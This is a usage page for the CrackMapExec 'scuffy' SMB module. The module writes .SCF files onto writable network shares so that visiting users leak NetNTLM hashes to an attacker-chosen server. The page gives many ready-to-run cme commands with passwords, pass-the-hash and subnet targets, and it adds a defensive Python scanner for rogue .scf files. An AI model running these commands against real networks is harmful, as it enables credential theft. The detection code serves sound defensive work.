CrackMapExec Scuffy (smb)


This page contains detailed information about how to use the scuffy CME module while using the smb protocol. For a list of all CrackMapExec modules, visit the CrackMapExec Module Library.

Description


This module creates a .SCF file on all remote writable shares. The .SCF file contains an icon property with a UNC path pointing to an arbitrary SERVER location (ideally the attacker's machine). Afterwards, anyone who visits the shared folder (with the .SCF file inside) will automatically try to authenticate against the specified SERVER and send their NetNTLM hash. The attacker can then capture the NetNTLM hash (e.g. by using Responder or the auxiliary/server/capture/smb Metasploit module) and crack it.

The scuffy module is OPSEC unsafe, which means that it may touch the disk and can therefore trigger an alarm.
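
Because the file lands on disk, a share owner can look for it by the property described above. The following is an added example, not CrackMapExec code: it walks a directory tree and reports .scf files in which any key holds a UNC path to a host outside an allowlist. The IconFile key and the layout of the constructed samples are assumed from the standard SCF format, and all function names are hypothetical.

```python
import re
import tempfile
from pathlib import Path

# \\host\... (or //host/...) at the start of a value; group 1 is the host.
UNC_RE = re.compile(r"^[\\/]{2}([^\\/]+)[\\/]")

def unc_host(value):
    """Return the lowercased host of a UNC path, or None if not UNC."""
    m = UNC_RE.match(value.strip().strip('"'))
    return m.group(1).lower() if m else None

def read_text(path):
    """Decode a file as UTF-16 (if it has a BOM) or as single-byte text."""
    raw = Path(path).read_bytes()  # SCF files are only a few lines long
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("latin-1")

def scan_scf(path, allowed_hosts=frozenset()):
    """List (key, host) for each key=value pointing at a non-allowed UNC host."""
    findings = []
    for line in read_text(path).splitlines():
        key, sep, value = line.partition("=")
        host = unc_host(value) if sep else None
        if host and host not in allowed_hosts:
            findings.append((key.strip(), host))
    return findings

def scan_tree(root, allowed_hosts=frozenset()):
    """Walk root and return {path: findings} for flagged .scf files."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() == ".scf":
            found = scan_scf(path, allowed_hosts)
            if found:
                hits[str(path)] = found
    return hits

def demo():
    """Scan two constructed sample files in a temporary directory."""
    samples = {  # constructed samples, not captured from a real share
        "test.scf": "[Shell]\nCommand=2\nIconFile=\\\\10.0.6.11\\share\\icon.ico\n",
        "desktop.scf": "[Shell]\nCommand=2\nIconFile=explorer.exe,3\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            Path(root, name).write_bytes(body.encode("ascii"))
        return {Path(p).name: f for p, f in scan_tree(root).items()}
```

Pass the lowercased names of legitimate file servers as allowed_hosts so that only unexpected destinations are reported.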

Supported Protocols


  • smb

Module Options


Here is a complete list of scuffy module options:

# cme smb -M scuffy --options
[*] scuffy module options:

        SERVER      IP of the SMB server
        NAME        SCF file name
        CLEANUP     Cleanup (choices: True or False)

The SERVER and NAME options are required! Make sure to set them when using this module.

Module Usage


This is how to use the scuffy module while using the smb protocol:

Syntax:
# cme smb <TARGET[s]> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -M scuffy -o SERVER=<host> -o NAME=<name>

Local admin:
# cme smb 10.0.5.1 -u Administrator -p P@ss123 -d . -M scuffy -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.1 -u Administrator -p P@ss123 --local-auth -M scuffy -o SERVER=10.0.6.11 -o NAME=test

Domain user:
# cme smb 10.0.5.1 -u bkpadmin -p P@ss123 -d target.corp -M scuffy -o SERVER=10.0.6.11 -o NAME=test

CrackMapExec also supports passing the hash, so you can specify an NTLM hash instead of a password:

# cme smb 10.0.5.1 -u Administrator -H 432b022dc22aa5afe884e986b8383ff2 -d . -M scuffy -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.1 -u bkpadmin -H 432b022dc22aa5afe884e986b8383ff2 -d target.corp -M scuffy -o SERVER=10.0.6.11 -o NAME=test

The scuffy module can also be run against multiple hosts, given as a target list file, a CIDR range, or an IP range:

# cme smb target_list.txt -u Administrator -p P@ss123 -d . -M scuffy -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.0/24 -u Administrator -p P@ss123 -d . -M scuffy -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.1-100 -u Administrator -p P@ss123 -d . -M scuffy -o SERVER=10.0.6.11 -o NAME=test

Version


This page has been created based on CrackMapExec version 5.1.7dev.